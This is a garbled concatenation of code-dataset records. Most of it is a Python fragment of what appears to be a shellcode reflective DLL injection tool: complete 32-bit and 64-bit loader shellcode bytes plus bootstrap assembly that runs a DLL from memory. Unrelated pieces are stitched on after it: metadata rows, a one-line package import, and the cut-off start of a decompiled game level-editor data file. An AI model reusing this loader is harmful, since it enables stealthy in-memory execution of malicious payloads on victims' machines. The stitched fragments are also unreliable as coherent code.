rdiShellcode32 = b"\x83\xEC\x48\x83\x64\x24\x18\x00\xB9\x4C\x77\x26\x07\x53\x55\x56\x57\x33\xF6\xE8\x22\x04\x00\x00\xB9\x49\xF7\x02\x78\x89\x44\x24\x1C\xE8\x14\x04\x00\x00\xB9\x58\xA4\x53\xE5\x89\x44\x24\x20\xE8\x06\x04\x00\x00\xB9\x10\xE1\x8A\xC3\x8B\xE8\xE8\xFA\x03\x00\x00\xB9\xAF\xB1\x5C\x94\x89\x44\x24\x2C\xE8\xEC\x03\x00\x00\xB9\x33\x00\x9E\x95\x89\x44\x24\x30\xE8\xDE\x03\x00\x00\x8B\xD8\x8B\x44\x24\x5C\x8B\x78\x3C\x03\xF8\x89\x7C\x24\x10\x81\x3F\x50\x45\x00\x00\x74\x07\x33\xC0\xE9\xB8\x03\x00\x00\xB8\x4C\x01\x00\x00\x66\x39\x47\x04\x75\xEE\xF6\x47\x38\x01\x75\xE8\x0F\xB7\x57\x06\x0F\xB7\x47\x14\x85\xD2\x74\x22\x8D\x4F\x24\x03\xC8\x83\x79\x04\x00\x8B\x01\x75\x05\x03\x47\x38\xEB\x03\x03\x41\x04\x3B\xC6\x0F\x47\xF0\x83\xC1\x28\x83\xEA\x01\x75\xE3\x8D\x44\x24\x34\x50\xFF\xD3\x8B\x44\x24\x38\x8B\x5F\x50\x8D\x50\xFF\x8D\x48\xFF\xF7\xD2\x48\x03\xCE\x03\xC3\x23\xCA\x23\xC2\x3B\xC1\x75\x97\x6A\x04\x68\x00\x30\x00\x00\x53\x6A\x00\xFF\xD5\x8B\x77\x54\x8B\xD8\x8B\x44\x24\x5C\x33\xC9\x89\x44\x24\x14\x8B\xD3\x33\xC0\x89\x5C\x24\x18\x40\x89\x44\x24\x24\x85\xF6\x74\x37\x8B\x6C\x24\x6C\x8B\x5C\x24\x14\x23\xE8\x4E\x85\xED\x74\x19\x8B\xC7\x2B\x44\x24\x5C\x3B\xC8\x73\x0F\x83\xF9\x3C\x72\x05\x83\xF9\x3E\x76\x05\xC6\x02\x00\xEB\x04\x8A\x03\x88\x02\x41\x43\x42\x85\xF6\x75\xD7\x8B\x5C\x24\x18\x0F\xB7\x47\x06\x0F\xB7\x4F\x14\x85\xC0\x74\x38\x83\xC7\x2C\x03\xCF\x8B\x7C\x24\x5C\x8B\x51\xF8\x48\x8B\x31\x03\xD3\x8B\x69\xFC\x03\xF7\x89\x44\x24\x5C\x85\xED\x74\x0F\x8A\x06\x88\x02\x42\x46\x83\xED\x01\x75\xF5\x8B\x44\x24\x5C\x83\xC1\x28\x85\xC0\x75\xD5\x8B\x7C\x24\x10\x8B\xB7\x80\x00\x00\x00\x03\xF3\x89\x74\x24\x14\x8B\x46\x0C\x85\xC0\x74\x7D\x03\xC3\x50\xFF\x54\x24\x20\x8B\x6E\x10\x8B\xF8\x8B\x06\x03\xEB\x03\xC3\x89\x44\x24\x5C\x83\x7D\x00\x00\x74\x4F\x8B\x74\x24\x20\x8B\x08\x85\xC9\x74\x1E\x79\x1C\x8B\x47\x3C\x0F\xB7\xC9\x8B\x44\x38\x78\x2B\x4C\x38\x10\x8B\x44\x38\x1C\x8D\x04\x88\x8B\x04\x38\x03\xC7\xEB\x0C\x8B\x45\x00\x83\xC0\x02\x03\xC3\x50\x57\xFF\xD6\x89\x45\x00\x83\xC5\x04\x8B\x44\x24\x5C\x83\xC0\x04\x89\x44\x24\x5C\x83\x7D\x00\x00\x75\xB9\x8B\x74\x24\x14\x8B\x46\x20\x83\xC6\x14\x89\x74\x24\x14\x85\xC0\x75\x87\x8B\x7C\x24\x10\x8B\xEB\x2B\x6F\x34\x83\xBF\xA4\x00\x00\x00\x00\x0F\x84\xAA\x00\x00\x00\x8B\x97\xA0\x00\x00\x00\x03\xD3\x89\x54\x24\x5C\x8D\x4A\x04\x8B\x01\x89\x4C\x24\x14\x85\xC0\x0F\x84\x8D\x00\x00\x00\x8B\x32\x8D\x78\xF8\x03\xF3\x8D\x42\x08\xD1\xEF\x89\x44\x24\x20\x74\x60\x6A\x02\x8B\xD8\x5A\x0F\xB7\x0B\x4F\x66\x8B\xC1\x66\xC1\xE8\x0C\x66\x83\xF8\x0A\x74\x06\x66\x83\xF8\x03\x75\x0B\x81\xE1\xFF\x0F\x00\x00\x01\x2C\x31\xEB\x27\x66\x3B\x44\x24\x24\x75\x11\x81\xE1\xFF\x0F\x00\x00\x8B\xC5\xC1\xE8\x10\x66\x01\x04\x31\xEB\x0F\x66\x3B\xC2\x75\x0A\x81\xE1\xFF\x0F\x00\x00\x66\x01\x2C\x31\x03\xDA\x85\xFF\x75\xB1\x8B\x5C\x24\x18\x8B\x54\x24\x5C\x8B\x4C\x24\x14\x03\x11\x89\x54\x24\x5C\x8D\x4A\x04\x8B\x01\x89\x4C\x24\x14\x85\xC0\x0F\x85\x77\xFF\xFF\xFF\x8B\x7C\x24\x10\x0F\xB7\x47\x06\x0F\xB7\x4F\x14\x85\xC0\x0F\x84\xB7\x00\x00\x00\x8B\x74\x24\x5C\x8D\x6F\x3C\x03\xE9\x48\x83\x7D\xEC\x00\x89\x44\x24\x24\x0F\x86\x94\x00\x00\x00\x8B\x4D\x00\x33\xD2\x42\x8B\xC1\xC1\xE8\x1D\x23\xC2\x8B\xD1\xC1\xEA\x1E\x83\xE2\x01\xC1\xE9\x1F\x85\xC0\x75\x18\x85\xD2\x75\x07\x6A\x08\x5E\x6A\x01\xEB\x05\x6A\x04\x5E\x6A\x02\x85\xC9\x58\x0F\x44\xF0\xEB\x2C\x85\xD2\x75\x17\x85\xC9\x75\x04\x6A\x10\xEB\x15\x85\xD2\x75\x0B\x85\xC9\x74\x18\xBE\x80\x00\x00\x00\xEB\x11\x85\xC9\x75\x05\x6A\x20\x5E\xEB\x08\x6A\x40\x85\xC9\x58\x0F\x45\xF0\x8B\x4D\x00\x8B\xC6\x0D\x00\x02\x00\x00\x81\xE1\x00\x00\x00\x04\x0F\x44\xC6\x8B\xF0\x8D\x44\x24\x28\x50\x8B\x45\xE8\x56\xFF\x75\xEC\x03\xC3\x50\xFF\x54\x24\x3C\x85\xC0\x0F\x84\xEC\xFC\xFF\xFF\x8B\x44\x24\x24\x83\xC5\x28\x85\xC0\x0F\x85\x52\xFF\xFF\xFF\x8B\x77\x28\x6A\x00\x6A\x00\x6A\xFF\x03\xF3\xFF\x54\x24\x3C\x33\xC0\x40\x50\x50\x53\xFF\xD6\x83\x7C\x24\x60\x00\x74\x7C\x83\x7F\x7C\x00\x74\x76\x8B\x4F\x78\x03\xCB\x8B\x41\x18\x85\xC0\x74\x6A\x83\x79\x14\x00\x74\x64\x8B\x69\x20\x8B\x79\x24\x03\xEB\x83\x64\x24\x5C\x00\x03\xFB\x85\xC0\x74\x51\x8B\x75\x00\x03\xF3\x33\xD2\x0F\xBE\x06\xC1\xCA\x0D\x03\xD0\x46\x80\x7E\xFF\x00\x75\xF1\x39\x54\x24\x60\x74\x16\x8B\x44\x24\x5C\x83\xC5\x04\x40\x83\xC7\x02\x89\x44\x24\x5C\x3B\x41\x18\x72\xD0\xEB\x1F\x0F\xB7\x17\x83\xFA\xFF\x74\x17\x8B\x41\x1C\xFF\x74\x24\x68\xFF\x74\x24\x68\x8D\x04\x90\x8B\x04\x18\x03\xC3\xFF\xD0\x59\x59\x8B\xC3\x5F\x5E\x5D\x5B\x83\xC4\x48\xC3\x83\xEC\x10\x64\xA1\x30\x00\x00\x00\x53\x55\x56\x8B\x40\x0C\x57\x89\x4C\x24\x18\x8B\x70\x0C\xE9\x8A\x00\x00\x00\x8B\x46\x30\x33\xC9\x8B\x5E\x2C\x8B\x36\x89\x44\x24\x14\x8B\x42\x3C\x8B\x6C\x10\x78\x89\x6C\x24\x10\x85\xED\x74\x6D\xC1\xEB\x10\x33\xFF\x85\xDB\x74\x1F\x8B\x6C\x24\x14\x8A\x04\x2F\xC1\xC9\x0D\x3C\x61\x0F\xBE\xC0\x7C\x03\x83\xC1\xE0\x03\xC8\x47\x3B\xFB\x72\xE9\x8B\x6C\x24\x10\x8B\x44\x2A\x20\x33\xDB\x8B\x7C\x2A\x18\x03\xC2\x89\x7C\x24\x14\x85\xFF\x74\x31\x8B\x28\x33\xFF\x03\xEA\x83\xC0\x04\x89\x44\x24\x1C\x0F\xBE\x45\x00\xC1\xCF\x0D\x03\xF8\x45\x80\x7D\xFF\x00\x75\xF0\x8D\x04\x0F\x3B\x44\x24\x18\x74\x20\x8B\x44\x24\x1C\x43\x3B\x5C\x24\x14\x72\xCF\x8B\x56\x18\x85\xD2\x0F\x85\x6B\xFF\xFF\xFF\x33\xC0\x5F\x5E\x5D\x5B\x83\xC4\x10\xC3\x8B\x74\x24\x10\x8B\x44\x16\x24\x8D\x04\x58\x0F\xB7\x0C\x10\x8B\x44\x16\x1C\x8D\x04\x88\x8B\x04\x10\x03\xC2\xEB\xDB"
rdiShellcode64 = b"\x48\x8B\xC4\x44\x89\x48\x20\x4C\x89\x40\x18\x89\x50\x10\x53\x55\x56\x57\x41\x54\x41\x55\x41\x56\x41\x57\x48\x83\xEC\x78\x83\x60\x08\x00\x48\x8B\xE9\xB9\x4C\x77\x26\x07\x44\x8B\xFA\x33\xDB\xE8\xA4\x04\x00\x00\xB9\x49\xF7\x02\x78\x4C\x8B\xE8\xE8\x97\x04\x00\x00\xB9\x58\xA4\x53\xE5\x48\x89\x44\x24\x20\xE8\x88\x04\x00\x00\xB9\x10\xE1\x8A\xC3\x48\x8B\xF0\xE8\x7B\x04\x00\x00\xB9\xAF\xB1\x5C\x94\x48\x89\x44\x24\x30\xE8\x6C\x04\x00\x00\xB9\x33\x00\x9E\x95\x48\x89\x44\x24\x28\x4C\x8B\xE0\xE8\x5A\x04\x00\x00\x48\x63\x7D\x3C\x4C\x8B\xD0\x48\x03\xFD\x81\x3F\x50\x45\x00\x00\x74\x07\x33\xC0\xE9\x2D\x04\x00\x00\xB8\x64\x86\x00\x00\x66\x39\x47\x04\x75\xEE\x41\xBE\x01\x00\x00\x00\x44\x84\x77\x38\x75\xE2\x0F\xB7\x47\x06\x0F\xB7\x4F\x14\x44\x8B\x4F\x38\x85\xC0\x74\x2C\x48\x8D\x57\x24\x44\x8B\xC0\x48\x03\xD1\x8B\x4A\x04\x85\xC9\x75\x07\x8B\x02\x49\x03\xC1\xEB\x04\x8B\x02\x03\xC1\x48\x3B\xC3\x48\x0F\x47\xD8\x48\x83\xC2\x28\x4D\x2B\xC6\x75\xDE\x48\x8D\x4C\x24\x38\x41\xFF\xD2\x44\x8B\x44\x24\x3C\x44\x8B\x4F\x50\x41\x8D\x40\xFF\xF7\xD0\x41\x8D\x50\xFF\x41\x03\xD1\x49\x8D\x48\xFF\x48\x23\xD0\x48\x03\xCB\x49\x8D\x40\xFF\x48\xF7\xD0\x48\x23\xC8\x48\x3B\xD1\x0F\x85\x6B\xFF\xFF\xFF\x33\xC9\x41\x8B\xD1\x41\xB8\x00\x30\x00\x00\x44\x8D\x49\x04\xFF\xD6\x44\x8B\x47\x54\x33\xD2\x48\x8B\xF0\x4C\x8B\xD5\x48\x8B\xC8\x44\x8D\x5A\x02\x4D\x85\xC0\x74\x3F\x44\x8B\x8C\x24\xE0\x00\x00\x00\x45\x23\xCE\x4D\x2B\xC6\x45\x85\xC9\x74\x19\x48\x8B\xC7\x48\x2B\xC5\x48\x3B\xD0\x73\x0E\x48\x8D\x42\xC4\x49\x3B\xC3\x76\x05\xC6\x01\x00\xEB\x05\x41\x8A\x02\x88\x01\x49\x03\xD6\x4D\x03\xD6\x49\x03\xCE\x4D\x85\xC0\x75\xCC\x44\x0F\xB7\x57\x06\x0F\xB7\x47\x14\x4D\x85\xD2\x74\x38\x48\x8D\x4F\x2C\x48\x03\xC8\x8B\x51\xF8\x4D\x2B\xD6\x44\x8B\x01\x48\x03\xD6\x44\x8B\x49\xFC\x4C\x03\xC5\x4D\x85\xC9\x74\x10\x41\x8A\x00\x4D\x03\xC6\x88\x02\x49\x03\xD6\x4D\x2B\xCE\x75\xF0\x48\x83\xC1\x28\x4D\x85\xD2\x75\xCF\x8B\x9F\x90\x00\x00\x00\x48\x03\xDE\x8B\x43\x0C\x85\xC0\x0F\x84\x8A\x00\x00\x00\x48\x8B\x6C\x24\x20\x8B\xC8\x48\x03\xCE\x41\xFF\xD5\x44\x8B\x3B\x4C\x8B\xE0\x44\x8B\x73\x10\x4C\x03\xFE\x4C\x03\xF6\xEB\x49\x49\x83\x3F\x00\x7D\x29\x49\x63\x44\x24\x3C\x41\x0F\xB7\x17\x42\x8B\x8C\x20\x88\x00\x00\x00\x42\x8B\x44\x21\x10\x42\x8B\x4C\x21\x1C\x48\x2B\xD0\x49\x03\xCC\x8B\x04\x91\x49\x03\xC4\xEB\x0F\x49\x8B\x16\x49\x8B\xCC\x48\x83\xC2\x02\x48\x03\xD6\xFF\xD5\x49\x89\x06\x49\x83\xC6\x08\x49\x83\xC7\x08\x49\x83\x3E\x00\x75\xB1\x8B\x43\x20\x48\x83\xC3\x14\x85\xC0\x75\x8C\x44\x8B\xBC\x24\xC8\x00\x00\x00\x44\x8D\x70\x01\x4C\x8B\x64\x24\x28\x4C\x8B\xCE\x41\xBD\x02\x00\x00\x00\x4C\x2B\x4F\x30\x83\xBF\xB4\x00\x00\x00\x00\x0F\x84\x95\x00\x00\x00\x8B\x97\xB0\x00\x00\x00\x48\x03\xD6\x8B\x42\x04\x85\xC0\x0F\x84\x81\x00\x00\x00\xBB\xFF\x0F\x00\x00\x44\x8B\x02\x4C\x8D\x5A\x08\x44\x8B\xD0\x4C\x03\xC6\x49\x83\xEA\x08\x49\xD1\xEA\x74\x59\x41\x0F\xB7\x0B\x4D\x2B\xD6\x0F\xB7\xC1\x66\xC1\xE8\x0C\x66\x83\xF8\x0A\x75\x09\x48\x23\xCB\x4E\x01\x0C\x01\xEB\x34\x66\x83\xF8\x03\x75\x09\x48\x23\xCB\x46\x01\x0C\x01\xEB\x25\x66\x41\x3B\xC6\x75\x11\x48\x23\xCB\x49\x8B\xC1\x48\xC1\xE8\x10\x66\x42\x01\x04\x01\xEB\x0E\x66\x41\x3B\xC5\x75\x08\x48\x23\xCB\x66\x46\x01\x0C\x01\x4D\x03\xDD\x4D\x85\xD2\x75\xA7\x8B\x42\x04\x48\x03\xD0\x8B\x42\x04\x85\xC0\x75\x84\x0F\xB7\x6F\x06\x0F\xB7\x47\x14\x48\x85\xED\x0F\x84\xCF\x00\x00\x00\x8B\x9C\x24\xC0\x00\x00\x00\x4C\x8D\x77\x3C\x4C\x8B\x6C\x24\x30\x4C\x03\xF0\x48\xFF\xCD\x41\x83\x7E\xEC\x00\x0F\x86\x9D\x00\x00\x00\x45\x8B\x06\x41\x8B\xD0\xC1\xEA\x1E\x41\x8B\xC0\x41\x8B\xC8\xC1\xE8\x1D\x83\xE2\x01\xC1\xE9\x1F\x83\xE0\x01\x75\x1E\x85\xD2\x75\x0B\xF7\xD9\x1B\xDB\x83\xE3\x07\xFF\xC3\xEB\x3E\xF7\xD9\xB8\x02\x00\x00\x00\x1B\xDB\x23\xD8\x03\xD8\xEB\x2F\x85\xD2\x75\x18\x85\xC9\x75\x05\x8D\x5A\x10\xEB\x22\x85\xD2\x75\x0B\x85\xC9\x74\x1A\xBB\x80\x00\x00\x00\xEB\x13\x85\xC9\x75\x05\x8D\x59\x20\xEB\x0A\x85\xC9\xB8\x40\x00\x00\x00\x0F\x45\xD8\x41\x8B\x4E\xE8\x4C\x8D\x8C\x24\xC0\x00\x00\x00\x41\x8B\x56\xEC\x8B\xC3\x0F\xBA\xE8\x09\x41\x81\xE0\x00\x00\x00\x04\x0F\x44\xC3\x48\x03\xCE\x44\x8B\xC0\x8B\xD8\x41\xFF\xD5\x85\xC0\x0F\x84\xA1\xFC\xFF\xFF\x49\x83\xC6\x28\x48\x85\xED\x0F\x85\x48\xFF\xFF\xFF\x44\x8D\x6D\x02\x8B\x5F\x28\x45\x33\xC0\x33\xD2\x48\x83\xC9\xFF\x48\x03\xDE\x41\xFF\xD4\xBD\x01\x00\x00\x00\x48\x8B\xCE\x44\x8B\xC5\x8B\xD5\xFF\xD3\x45\x85\xFF\x0F\x84\x97\x00\x00\x00\x83\xBF\x8C\x00\x00\x00\x00\x0F\x84\x8A\x00\x00\x00\x8B\x97\x88\x00\x00\x00\x48\x03\xD6\x44\x8B\x5A\x18\x45\x85\xDB\x74\x78\x83\x7A\x14\x00\x74\x72\x44\x8B\x52\x20\x33\xDB\x44\x8B\x4A\x24\x4C\x03\xD6\x4C\x03\xCE\x45\x85\xDB\x74\x5D\x45\x8B\x02\x4C\x03\xC6\x33\xC9\x41\x0F\xBE\x00\x4C\x03\xC5\xC1\xC9\x0D\x03\xC8\x41\x80\x78\xFF\x00\x75\xED\x44\x3B\xF9\x74\x10\x03\xDD\x49\x83\xC2\x04\x4D\x03\xCD\x41\x3B\xDB\x72\xD2\xEB\x2D\x41\x0F\xB7\x01\x83\xF8\xFF\x74\x24\x8B\x52\x1C\x48\x8B\x8C\x24\xD0\x00\x00\x00\xC1\xE0\x02\x48\x98\x48\x03\xC6\x44\x8B\x04\x02\x8B\x94\x24\xD8\x00\x00\x00\x4C\x03\xC6\x41\xFF\xD0\x48\x8B\xC6\x48\x83\xC4\x78\x41\x5F\x41\x5E\x41\x5D\x41\x5C\x5F\x5E\x5D\x5B\xC3\xCC\xCC\xCC\x48\x89\x5C\x24\x08\x48\x89\x74\x24\x10\x57\x48\x83\xEC\x10\x65\x48\x8B\x04\x25\x60\x00\x00\x00\x8B\xF1\x48\x8B\x50\x18\x4C\x8B\x4A\x10\x4D\x8B\x41\x30\x4D\x85\xC0\x0F\x84\xB4\x00\x00\x00\x41\x0F\x10\x41\x58\x49\x63\x40\x3C\x33\xD2\x4D\x8B\x09\xF3\x0F\x7F\x04\x24\x42\x8B\x9C\x00\x88\x00\x00\x00\x85\xDB\x74\xD4\x48\x8B\x04\x24\x48\xC1\xE8\x10\x44\x0F\xB7\xD0\x45\x85\xD2\x74\x21\x48\x8B\x4C\x24\x08\x45\x8B\xDA\x0F\xBE\x01\xC1\xCA\x0D\x80\x39\x61\x7C\x03\x83\xC2\xE0\x03\xD0\x48\xFF\xC1\x49\x83\xEB\x01\x75\xE7\x4D\x8D\x14\x18\x33\xC9\x41\x8B\x7A\x20\x49\x03\xF8\x41\x39\x4A\x18\x76\x8F\x8B\x1F\x45\x33\xDB\x49\x03\xD8\x48\x8D\x7F\x04\x0F\xBE\x03\x48\xFF\xC3\x41\xC1\xCB\x0D\x44\x03\xD8\x80\x7B\xFF\x00\x75\xED\x41\x8D\x04\x13\x3B\xC6\x74\x0D\xFF\xC1\x41\x3B\x4A\x18\x72\xD1\xE9\x5B\xFF\xFF\xFF\x41\x8B\x42\x24\x03\xC9\x49\x03\xC0\x0F\xB7\x14\x01\x41\x8B\x4A\x1C\x49\x03\xC8\x8B\x04\x91\x49\x03\xC0\xEB\x02\x33\xC0\x48\x8B\x5C\x24\x20\x48\x8B\x74\x24\x28\x48\x83\xC4\x10\x5F\xC3"
if is64BitDLL(dllBytes):
rdiShellcode = rdiShellcode64
bootstrap = b''
bootstrapSize = 64
# call next instruction (Pushes next instruction address to stack)
bootstrap += b'\xe8\x00\x00\x00\x00'
# Set the offset to our DLL from pop result
dllOffset = bootstrapSize - len(bootstrap) + len(rdiShellcode)
# pop rcx - Capture our current location in memory
bootstrap += b'\x59'
# mov r8, rcx - copy our location in memory to r8 before we start modifying RCX
bootstrap += b'\x49\x89\xc8'
# add rcx, <Offset of the DLL>
bootstrap += b'\x48\x81\xc1'
bootstrap += pack('I', dllOffset)
# mov edx, <Hash of function>
bootstrap += b'\xba'
bootstrap += pack('I', functionHash)
# Setup the location of our user data
# add r8, <Offset of the DLL> + <Length of DLL>
bootstrap += b'\x49\x81\xc0'
userDataLocation = dllOffset + len(dllBytes)
bootstrap += pack('I', userDataLocation)
# mov r9d, <Length of User Data>
bootstrap += b'\x41\xb9'
bootstrap += pack('I', len(userData))
# push rsi - save original value
bootstrap += b'\x56'
# mov rsi, rsp - store our current stack pointer for later
bootstrap += b'\x48\x89\xe6'
# and rsp, 0x0FFFFFFFFFFFFFFF0 - Align the stack to 16 bytes
bootstrap += b'\x48\x83\xe4\xf0'
# sub rsp, 0x30 - Create some breathing room on the stack
bootstrap += b'\x48\x83\xec'
bootstrap += b'\x30' # 32 bytes for shadow space + 8 bytes for last arg + 8 bytes for stack alignment
# mov dword ptr [rsp + 0x20], <Flags> - Push arg 5 just above shadow space
bootstrap += b'\xC7\x44\x24'
bootstrap += b'\x20'
bootstrap += pack('I', flags)
# call - Transfer execution to the RDI
bootstrap += b'\xe8'
bootstrap += pack('b', bootstrapSize - len(bootstrap) - 4) # Skip over the remainder of instructions
bootstrap += b'\x00\x00\x00'
# mov rsp, rsi - Reset our original stack pointer
bootstrap += b'\x48\x89\xf4'
# pop rsi - Put things back where we left them
bootstrap += b'\x5e'
# ret - return to caller
bootstrap += b'\xc3'
# Ends up looking like this in memory:
# Bootstrap shellcode
# RDI shellcode
# DLL bytes
# User data
return bootstrap + rdiShellcode + dllBytes + userData
else: # 32 bit
rdiShellcode = rdiShellcode32
bootstrap = b''
bootstrapSize = 45
# call next instruction (Pushes next instruction address to stack)
bootstrap += b'\xe8\x00\x00\x00\x00'
# Set the offset to our DLL from pop result
dllOffset = bootstrapSize - len(bootstrap) + len(rdiShellcode)
# pop ecx - Capture our current location in memory
bootstrap += b'\x58'
# mov ebx, eax - copy our location in memory to ebx before we start modifying eax
bootstrap += b'\x89\xc3'
# add eax, <Offset to the DLL>
bootstrap += b'\x05'
bootstrap += pack('I', dllOffset)
# add ebx, <Offset to the DLL> + <Size of DLL>
bootstrap += b'\x81\xc3'
userDataLocation = dllOffset + len(dllBytes)
bootstrap += pack('I', userDataLocation)
# push <Flags>
bootstrap += b'\x68'
bootstrap += pack('I', flags)
# push <Length of User Data>
bootstrap += b'\x68'
bootstrap += pack('I', len(userData))
# push ebx
bootstrap += b'\x53'
# push <hash of function>
bootstrap += b'\x68'
bootstrap += pack('I', functionHash)
# push eax
bootstrap += b'\x50'
# call - Transfer execution to the RDI
bootstrap += b'\xe8'
bootstrap += pack('b', bootstrapSize - len(bootstrap) - 4) # Skip over the remainder of instructions
bootstrap += b'\x00\x00\x00'
# add esp, 0x14 - correct the stack pointer
bootstrap += b'\x83\xc4\x14'
# ret - return to caller
bootstrap += b'\xc3'
# Ends up looking like this in memory:
# Bootstrap shellcode
# RDI shellcode
# DLL bytes
# User data
return bootstrap + rdiShellcode + dllBytes + userData
return False
| 86.474227 | 5,964 | 0.693014 | 3,458 | 16,776 | 3.358878 | 0.112782 | 0.062505 | 0.037968 | 0.009298 | 0.284718 | 0.227637 | 0.173052 | 0.158588 | 0.112957 | 0.108308 | 0 | 0.287552 | 0.105508 | 16,776 | 193 | 5,965 | 86.92228 | 0.486472 | 0.102825 | 0 | 0.450549 | 0 | 0.021978 | 0.762781 | 0.741985 | 0 | 1 | 0.002 | 0 | 0 | 1 | 0.032967 | false | 0 | 0.021978 | 0 | 0.10989 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7cebb3256038e87043837fa8a27e45e35beafd59 | 28 | py | Python | abacusevents/__init__.py | kairosfuture/abacusevents | 121215a6855f2e0371e557b5f0d1dd7f2f33e069 | [
"MIT"
] | null | null | null | abacusevents/__init__.py | kairosfuture/abacusevents | 121215a6855f2e0371e557b5f0d1dd7f2f33e069 | [
"MIT"
] | null | null | null | abacusevents/__init__.py | kairosfuture/abacusevents | 121215a6855f2e0371e557b5f0d1dd7f2f33e069 | [
"MIT"
] | null | null | null | from .abacusevents import *
| 14 | 27 | 0.785714 | 3 | 28 | 7.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 28 | 1 | 28 | 28 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6b354e9ad9a8d149f740fe1097ce51acf65e7231 | 34 | py | Python | crslab/data/dataset/redial/__init__.py | hcmus-nlp-chatbot/CRSLab | b3ab262a4ad93cbae98fe66541eb735377768a35 | [
"MIT"
] | 315 | 2021-01-05T06:31:57.000Z | 2022-03-16T21:12:23.000Z | crslab/data/dataset/redial/__init__.py | hcmus-nlp-chatbot/CRSLab | b3ab262a4ad93cbae98fe66541eb735377768a35 | [
"MIT"
] | 23 | 2021-01-09T05:43:26.000Z | 2022-03-28T21:05:49.000Z | crslab/data/dataset/redial/__init__.py | hcmus-nlp-chatbot/CRSLab | b3ab262a4ad93cbae98fe66541eb735377768a35 | [
"MIT"
] | 71 | 2021-01-05T06:31:59.000Z | 2022-03-06T06:30:35.000Z | from .redial import ReDialDataset
| 17 | 33 | 0.852941 | 4 | 34 | 7.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 34 | 1 | 34 | 34 | 0.966667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
86144d2c0d782a09f0e9c6fc4e95d5bcf1398c63 | 33,405 | py | Python | pirates/leveleditor/worldData/AnvilIsland.py | itsyaboyrocket/pirates | 6ca1e7d571c670b0d976f65e608235707b5737e3 | [
"BSD-3-Clause"
] | 3 | 2021-02-25T06:38:13.000Z | 2022-03-22T07:00:15.000Z | pirates/leveleditor/worldData/AnvilIsland.py | itsyaboyrocket/pirates | 6ca1e7d571c670b0d976f65e608235707b5737e3 | [
"BSD-3-Clause"
] | null | null | null | pirates/leveleditor/worldData/AnvilIsland.py | itsyaboyrocket/pirates | 6ca1e7d571c670b0d976f65e608235707b5737e3 | [
"BSD-3-Clause"
] | 1 | 2021-02-25T06:38:17.000Z | 2021-02-25T06:38:17.000Z | # uncompyle6 version 3.2.0
# Python bytecode 2.4 (62061)
# Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)]
# Embedded file name: pirates.leveleditor.worldData.AnvilIsland
from pandac.PandaModules import Point3, VBase3, Vec4, Vec3
objectStruct = {'Interact Links': [['1179265920.0dxschafe3', '1179266176.0dxschafe0', 'Bi-directional'], ['1179266048.0dxschafe1', '1179265920.0dxschafe4', 'Bi-directional'], ['1179265920.0dxschafe5', '1179266048.0dxschafe0', 'Bi-directional'], ['1179266176.0dxschafe', '1179265920.0dxschafe', 'Bi-directional'], ['1179266048.0dxschafe3', '1179266048.0dxschafe2', 'Bi-directional']], 'Locator Links': [['1172208953.19sdnaik', '1172172361.37kmuller', 'Bi-directional'], ['1172208953.17sdnaik', '1172209006.14sdnaik', 'Bi-directional']], 'Objects': {'1164135492.81dzlu': {'Type': 'Island', 'Name': "Devil's Anvil", 'File': '', 'AdditionalData': ['WildIslandC'], 'Environment': 'OpenSky', 'Minimap': False, 'Objects': {'1164766305.45sdnaik': {'Type': 'Player Spawn Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Index': -1, 'Pos': Point3(383.541, 187.297, 25.49), 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'All', 'Visual': {'Model': 'models/misc/smiley'}}, '1168745928.39WDIG': {'Type': 'Port Collision Sphere', 'Name': 'DevilsAnvilPort', 'Hpr': VBase3(0.0, 0.0, 0.0), 'Pos': Point3(141.014, -36.03, 0.0), 'Scale': VBase3(1435.579, 1435.579, 1435.579), 'VisSize': '', 'Visual': {'Color': (0.5, 0.5, 1.0, 0.2), 'Model': 'models/misc/smiley'}}, '1172172361.37kmuller': {'Type': 'Locator Node', 'Name': 'portal_exterior_1', 'Hpr': VBase3(62.291, 0.0, 0.0), 'Pos': Point3(138.788, 208.05, 26.94), 'Scale': VBase3(1.0, 1.0, 1.0)}, '1172208953.16sdnaik': {'Type': 'Connector Tunnel', 'File': '', 'Hpr': VBase3(149.405, 0.0, 0.0), 'Objects': {'1172208953.17sdnaik': {'Type': 'Locator Node', 'Name': 'portal_connector_1', 'GridPos': Point3(359.595, 418.268, 14.54), 'Hpr': VBase3(90.0, 0.0, 0.0), 'Pos': Point3(95.197, 150.0, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0)}, '1172208953.19sdnaik': {'Type': 'Locator Node', 'Name': 'portal_connector_2', 'GridPos': Point3(264.398, 271.529, 14.54), 'Hpr': VBase3(-90.0, 0.0, 0.0), 'Pos': Point3(8.658, 3.262, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0)}}, 'Pos': Point3(264.398, 268.268, 796.747), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 